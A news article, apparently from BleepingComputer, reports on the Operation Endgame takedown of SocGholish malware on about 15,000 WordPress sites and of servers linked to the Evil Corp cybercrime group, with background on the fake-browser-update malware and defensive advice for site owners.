Police clean 15,000 Evil Corp-linked SocGholish malware sites
▼ Summary
– Law enforcement cleaned nearly 15,000 WordPress websites infected with SocGholish malware and took down over 100 servers linked to Evil Corp as part of Operation Endgame.
– Authorities from the Netherlands, Canada, the U.S., and Germany removed malware from 14,971 compromised sites and offline 106 servers and domains.
– Dutch police advised website owners to change credentials, enable multi-factor authentication, delete unknown accounts, and keep WordPress updated.
– SocGholish is a JavaScript-based malware downloader active since 2017 that hijacks legitimate WordPress sites to trick users into installing fake browser updates.
– Evil Corp, a Russian cybercrime group active since 2007, has used SocGholish to deploy malware like Dridex and ransomware such as WastedLocker.
International law enforcement has dismantled nearly 15,000 compromised WordPress websites and taken offline over 100 servers linked to the SocGholish botnet and the notorious Russian cybercrime group Evil Corp. This coordinated crackdown, supported by Europol and Eurojust, is the latest phase of Operation Endgame, a sweeping global initiative aimed at crippling key infection chains used by high-profile cybercriminal networks.
Authorities from the Netherlands (NHCTU), Canada (RCMP), the United States (FBI), and Germany (BKA) cleaned SocGholish malware infections from 14,971 hijacked WordPress sites. In addition, they seized control of 106 servers and domains that powered the botnet. The Dutch police not only removed the malware and backdoors from infected sites but also urged website owners to change their credentials, enable multi-factor authentication, delete unknown WordPress accounts, and keep their platforms updated.
“With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware,” said Maikel Rollman of the Netherlands’ National High Tech Crime Unit. “It also reduces the risk that these systems are used for cyber-attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish.”
First documented in attacks dating back to at least 2017, the SocGholish JavaScript-based malware downloader , also tracked as FakeUpdates and GhoLoader , operates by hijacking legitimate websites, primarily those running WordPress, and tricking visitors into downloading malicious payloads disguised as fake browser updates. Once a user installs the bogus update, the malware establishes a connection with attackers, granting them remote access to the infected system. SocGholish has also been used as a delivery mechanism for other malware families, including Dridex, Doppelpaymer, Empire, Koadic, Chtonic, and Azorult.
This malware has long been tied to Evil Corp, a Russian cybercrime syndicate active since 2007. The group is infamous for developing the Zeus and Dridex malware families and orchestrating ransomware operations such as WastedLocker, Hades, Macaw Locker, and Phoenix CryptoLocker.
Rollman reiterated that “this marks the beginning of further action against SocGholish” in a press release published today. In November, as part of Operation Endgame, law enforcement also dismantled over 1,000 servers used by the Rhadamanthys, VenomRAT, and Elysium botnet malware operations. Previous phases of Operation Endgame have targeted ransomware infrastructure, Smokeloader botnet customers and servers, the AVCheck site, and a range of other major malware operations, including DanaBot, IcedID, Pikabot, Trickbot, Smokeloader, Bumblebee, and SystemBC.
(Source: BleepingComputer)